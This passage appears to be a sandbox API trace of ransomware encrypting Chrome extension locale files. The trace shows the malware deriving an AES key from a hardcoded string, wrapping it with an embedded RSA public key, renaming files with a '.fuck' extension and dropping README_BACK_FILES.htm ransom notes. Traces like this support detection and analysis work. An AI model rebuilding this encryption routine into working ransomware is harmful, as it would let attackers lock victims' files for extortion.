data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.002] GetFileType (hFile=0x5d50) returned 0x1 [0257.002] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.003] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.003] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.003] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.003] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.003] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.003] GetLastError () returned 0x0 [0257.003] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json")) returned 0x20 [0257.004] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json", dwFileAttributes=0x80) returned 1 [0257.004] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.005] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.006] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.006] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.008] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.008] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.008] CryptHashData (hHash=0x2e18128, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.008] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.008] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.008] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.008] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e14868) returned 1 [0257.009] CryptImportPublicKeyInfo (in: hCryptProv=0x2e14868, dwCertEncodingType=0x1, pInfo=0x2e2ae70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2aea0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2aea8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e199e8) returned 1 [0257.009] CryptEncrypt (in: hKey=0x2e199e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.009] CryptEncrypt (in: hKey=0x2e199e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14c20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e14c20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.009] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e14c20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e14c20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.015] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xd4, lpOverlapped=0x0) returned 1 [0257.016] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0257.016] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0257.016] CloseHandle (hObject=0x5d60) returned 1 [0257.017] CloseHandle (hObject=0x5d5c) returned 1 [0257.017] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json"), bFailIfExists=0) returned 1 [0257.019] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json", dwFileAttributes=0x0) returned 1 [0257.020] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json.gsg")) returned 1 [0257.021] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\messages.json.fuck")) returned 1 [0257.022] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.022] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.022] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.022] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.022] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.022] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\readme_back_files.htm")) returned 0xffffffff [0257.022] AreFileApisANSI () returned 1 [0257.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.023] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.023] GetFileType (hFile=0x5d50) returned 0x1 [0257.023] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.024] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.024] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.025] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.025] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.025] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.025] GetLastError () returned 0x0 [0257.025] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json")) returned 0x20 [0257.025] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json", dwFileAttributes=0x80) returned 1 [0257.026] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.026] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.027] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.027] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.029] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.029] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.029] CryptHashData (hHash=0x2e18128, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.029] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.030] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.030] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.030] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e14ca8) returned 1 [0257.030] CryptImportPublicKeyInfo (in: hCryptProv=0x2e14ca8, dwCertEncodingType=0x1, pInfo=0x2e2b5c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b5f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b5f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19f68) returned 1 [0257.030] CryptEncrypt (in: hKey=0x2e19f68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.030] CryptEncrypt (in: hKey=0x2e19f68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14e40*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e14e40*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.030] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e14e40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e14e40*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.031] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x98, lpOverlapped=0x0) returned 1 [0257.032] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x98, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xa0) returned 1 [0257.032] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xa0, lpOverlapped=0x0) returned 1 [0257.032] CloseHandle (hObject=0x5d5c) returned 1 [0257.033] CloseHandle (hObject=0x5d60) returned 1 [0257.033] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json"), bFailIfExists=0) returned 1 [0257.036] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json", dwFileAttributes=0x0) returned 1 [0257.036] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json.gsg")) returned 1 [0257.037] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\messages.json.fuck")) returned 1 [0257.038] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.038] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.038] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.038] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.038] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.038] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\readme_back_files.htm")) returned 0xffffffff [0257.039] AreFileApisANSI () returned 1 [0257.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.039] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.040] GetFileType (hFile=0x5d50) returned 0x1 [0257.040] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.041] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.042] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.042] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.042] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.042] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.042] GetLastError () returned 0x0 [0257.042] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json")) returned 0x20 [0257.042] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json", dwFileAttributes=0x80) returned 1 [0257.043] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.044] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.045] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.046] CryptAcquireContextA (in: phProv=0x2b9bc54, 